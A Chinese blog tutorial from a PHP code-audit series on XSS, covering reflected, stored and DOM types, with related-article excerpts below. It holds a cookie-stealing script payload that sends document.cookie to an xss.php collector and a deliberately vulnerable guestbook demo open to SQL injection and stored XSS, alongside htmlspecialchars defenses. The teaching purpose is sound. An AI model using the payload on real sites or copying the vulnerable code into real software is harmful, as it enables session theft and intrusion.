PHP代码审计————10、PHP代码审计之XSS

最新推荐文章于 2025-05-10 12:59:09 发布
最新推荐文章于 2025-05-10 12:59:09 发布
阅读量716 收藏 1
点赞数
分类专栏: 【代码审计】 # 代码审计系列
本文介绍了XSS漏洞的三种类型:反射型、存储型和基于DOM的XSS,并详细阐述了每种类型的攻击方式及防御措施。针对存储型XSS,还提供了具体的代码示例和SQL注入防范方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XSS漏洞大致分为三种

  • 反射型XSS漏洞
  • 存储型XSS漏洞
  • 基于DOM的XSS漏洞

反射型XSS漏洞

它通过给别人发送带有恶意脚本代码参数的URL,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行

它的特点是非持久化,必须用户点击带有特定参数的链接才能引起该漏洞的触发

变量直接输出

<?php

    echo $_GET['xss'];

?>

$_SERVER变量参数

$_SERVER['PHP_SELF']

$_SERVER['HTTP_USER_AGENT']

$_SERVER['HTTP_REQUER']

$_SERVER['REQUEST_URI']

http请求格式

User-Agent:      可以通过User-Agent进行构造XSS

Referer:            可以通过Reference进行构造,主要是burp suite抓包操作,进行修改即可

利用

Ttest:<script>alert('xss');</script>

Cookie:

<script>var i=new Image;  i.src='http://127.0.0.1/xss.php?c="%2bdocument.cookie;"'</script>

modify headers

存储型XSS

持久化,代码是存储在服务器数据库中的,如在个人信息或发表文章等地方,加入代码,若干没有过滤或过滤不严,那么这些代码将存储到服务器数据库中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,窃取Cookie等。

审计SQL语句:

主要是update 、insert更新和插入语句。

内容输入输出没有被严格过滤或者过滤不严!

防御

htmlspecialchars函数

预定义的字符是:

&  ——————&amp;

"———————&quot;

'———————&#039

<———————&lt;

>———————&gt;

例如:

表:

CREATE TABLE `book` (
`id` int(5) NOT NULL auto_increment,
`title` varchar(32) NOT NULL,
`con` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=gbk AUTO_INCREMENT=1 ;

<?php
mysql_connect('localhost','root','');
mysql_select_db('test');
mysql_query("set names gbk");
if(isset($_POST['submit'])){
$title=$_POST['title'];
$con=$_POST['con'];
$sql="INSERT INTO `book` (`id` ,`title` ,`con`)VALUES (NULL , '$title', '$con');";
if(mysql_query($sql)){
echo "留言成功";
}else{
echo "留言失败";
}
}else{
$sql="select * from book";
if($row=mysql_query($sql)){
while($rows=mysql_fetch_array($row)){
echo $rows['id'].$rows['title'].$rows['con']."<br>";
}
}
}
?>
<html>
<h1>暗月代码审计存储型 xss 漏洞演示</h1>
<form action="?action=insert" method="post">
标题:<input type="text" name="title"><br>
内容:<textarea name="con"></textarea>
<input type="submit" name="submit" value="提交">
<form>
</html>


PHP代码审计基础:XSS漏洞
1匹黑马
11-28 833
文章目录xss攻击xss的危害挖掘思路反射型xss常见场景存储型xss存储型与反射型的区别DOM型xss什么是DOM型xssDOM型常见属性 xss攻击 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内
PHP-代码审计-XSS
weixin_44110913的博客
08-27 252
文章目录XSS挖掘流程黑盒挖掘白盒挖掘DVWA白盒挖掘演练储存型反射型xss利用姿势复习 XSS挖掘流程 黑盒挖掘 直接像渗透一样挖掘即可,因为XSS通常是可以黑盒挖掘出来的 白盒挖掘 漏洞产生条件 用户输入参数:GET POST … 函数 输入到输出是否有过滤? 漏洞爱产生的位置 发文章处 回复评论处 用户昵称签名处 注册修改资料处 … 基本流程 寻找带有参数的输出函数 根据输出内容回溯输入参数 输出函数列表: print,print_r, echo, printf, sprintf, di
XSS攻击的代码审计要点?
最新发布
2501_90410679的博客
05-10 32
本文探讨了Web应用安全性中的关键问题——XSS(跨站脚本攻击)的代码审计XSS攻击通过注入恶意脚本操控用户浏览器,导致数据泄露等严重后果。文章提出了一系列审计要点:识别潜在风险、审查注入点、验证脚本执行环境、检查其他漏洞利用途径,并强调遵守法律法规和最佳实践的重要性。通过这些措施,开发者可以有效防范XSS攻击,确保Web应用的安全。
代码审计中的XSS
weixin_30726161的博客
03-10 216
0x00 背景 XSS漏洞也叫跨站脚本攻击,是Web漏洞中最常见的漏洞,原理与SQL注入相似,通过来自外部的输入直接在浏览器端触发。XSS漏洞通常被入侵者用来窃取Cookie等,本文以代码审计的形式研究XSS攻击原理、挖掘形式、防御方案及缺陷。 0x01 XSS攻击原理 我们看下面一段代码: 1 <?php 2 3 // Is there any input? ...
PHP代码审计 XSS专题
goddemon
02-04 407
一,XSS反射型漏洞 ①xss漏洞处 1.变量的直接输出 <?php echo $_GET['xss']; ?> 如cs.php存在的是上面的这个源码 http://127.0.0.1/cs.php?xss= 2.$_SERVER 变量参数 $_SERVER[‘PHP_SELF’] //直接在URL中输出执行XSS $_SERVER[‘HTTP_USER_AGENT’] //HTTP头中构造XSS $_SERVER[‘HTTP_REFERER’] //Referer头中构造XSS $_
代码审计——XSS
红队是青春
11-09 1617
代码审计——XSS篇(DVWA) 反射型XSS 反射型XSS——low级别 代码如下: 意思:函数"name",为可控,传入一个可控的变量值,不等于null空值,则直接echo输出固定语句Hello,加上所输入的可控变量值,无任何过滤。 框中输入:<script>alert('xss')</script> 反射型XSS——Medium级别 代码如下: 意思:同上,但传参时做了一些处理,多了一个str_replace()函数进行一个过滤,是将标签’script’进行过滤后再输
代码审计资料整理——新手学习
10-13
"LAMP安全审计之PHP代码审计_paper.pdf",LAMP(Linux, Apache, MySQL, PHP)是常见的Web开发环境,这份论文可能详细介绍了PHP代码审计的流程和技术,对于PHP初学者而言,这是深入理解PHP安全的关键。 "小脚本,大...
php代码审计系列教程,PHP代码审计工具——Rips详细使用教程
weixin_35980011的博客
03-10 1023
一、代码审计工具介绍代码审计工具可以辅助我们进行白盒测试,大大提高漏洞分析和代码挖掘的效率。在源代码的静态安全审计中,使用自动化工具辅助人工漏洞挖掘,一款好的代码审计软件,可以显著提高审计工作的效率。学会利用自动化代码审计工具,是每一个代码审计人员必备的能力。代码审计工具按照编程语言、审计原理、运行环境可以有多种分类。商业性的审计软件一般都支持多种编程语言,比如VCG、Fortify SCA,缺点...
代码审计(Java)——WebGoat_Xss
weixin_45260839的博客
08-16 772
代码审计(Java)——WebGoat_Xss
代码审计——DVWA DOM Based Cross Site Scripting (XSS) DOM型XSS
z1756227332的博客
03-13 1319
关于三种XSS类型的流程 DOM型 代码 -> 浏览器(js) 反射性型 代码 -> 浏览器 ->php -> 浏览器 存储性型 代码->浏览器->PHP->数据库->php->浏览器 Low等级代码 <?php 这个意思就是没有过滤 输入什么就会输出什么。 # No protections, anything goes 没有保护,什么都...
「信息安全」自动化代码审计de一些思路与局限——基于静态分析的PHP代码审计技术探 - 安全防御.zip
11-28
本主题探讨了基于静态分析的PHP代码审计技术,旨在揭示其在安全防御中的应用、潜在思路以及存在的局限性。 一、静态分析概述 静态分析是一种不执行程序的情况下,通过对源代码或编译后的二进制文件进行分析,来检测...
代码审计学习XSS
小白也要加油
02-05 2804
定义 跨站脚本攻击,为不和css一样写混淆,故跨站脚本呢攻击缩写为XSSXSS是一种Web应用程序的安全漏洞,主要是由于Web应用程序对用户的输入过滤不足产生的。恶意攻击者往Web页面里插入恶意脚本代码,当用户浏览该页之时,嵌入其中的Web里面的恶意脚本代码,攻击者便可以对受害者采取Cookie资料窃取,会话劫持,钓鱼欺骗等各种攻击 Less-1 <?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 al
PHP代码审计笔记--XSS
11-01 310
&#13;   跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。Web程序代码中把用户提交的参数未做过滤就直接输出到页面,参数中的特殊字符打破了HTML页面的原有逻辑,黑客可以利用该漏洞执行恶意Script代码,当用户浏览该页之时,嵌入其中Web里...
Java代码审计-XSS审计
baimaozi008的博客
05-24 1753
XSS是Cross Site Scripting的缩写,意为"跨站脚本攻击",为了避免与层叠样式表(Cascading Style Sheet,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。XSS是指攻击者在网页中嵌入客户端脚本(通常是JavaScript编写的恶意代码),进而执行其植入的代码的漏洞,若Web应用未对用户可直接活间接控制的"输入"或者"输出"进行关键字的过滤或者转义处理,则很有可能存在跨站脚本漏洞。
代码审计中的XSS(转载)
weixin_60777183的博客
10-15 224
0x00 背景 XSS漏洞也叫跨站脚本攻击,是Web漏洞中最常见的漏洞,原理与SQL注入相似,通过来自外部的输入直接在浏览器端触发。XSS漏洞通常被入侵者用来窃取Cookie等,本文以代码审计的形式研究XSS攻击原理、挖掘形式、防御方案及缺陷。 0x01 XSS攻击原理 我们看下面一段代码: 1 <?php 2 3 // Is there any input? 4 if( array_key_exists( "name", $_GET ) && $_GET[ 'name
【Java代码审计XSS
热门推荐
大河之犬的博客
12-16 2万+
XSS 漏洞是指攻击者在网页中嵌入客户端脚本(通常是 JavaScript 编写的恶意代码),进而执行其植入代码的漏洞。若 Web 应用未对用户可直接或间接控制的“输入”与“输出”参数进行关键字过滤或转义处理,则很可能存在跨站脚本漏洞。从 Web 应用上来看,攻击者可以控制的参数包括 URL 参数、post 提交的表单数据以及搜索框提交的搜索关键字,一般对该漏洞的审计策略如下收集输入、输出点查看输入、输出点的上下文环境。判断 Web 应用是否对输入、输出做了防御工作(如过滤、扰乱以及编码)
PHP代码审计5—XSS漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
07-26 1221
简单的XSS学习
代码审计——XSS详解
Boom!脑洞大爆炸的博客
06-17 2374
代码审计XSS详解
一次简单的XSS 代码审计
土豆的博客
08-19 564
——D&X安全实验室 0x01 代码分析: 1、首先全局搜索常被过滤函数或标签(尽量不要搜索标签,结果太多了不好筛查),此处以onclick为例,未能筛选到相关规则,可替换其他搜索: 2、以下为使用script搜索为例,审查筛选相关规则: 3、除此之外,我很还可以用搜索常见特征 ’过滤’字段搜索: 4、打开safestring.class.php可以看到之所以onclick搜不到是因为使用了正则的方式写的屏蔽on开头诸多函数: 5、寻找对应的XSS过..
新手入门代码审计:资料整理与实例分析
在进行PHP代码审计时,需要注意诸如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞、命令执行漏洞、会话管理缺陷等安全问题。 从【压缩包子文件的文件名称列表】中,我们可以提炼出以下学习知识点: 1. 实例分析讲解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值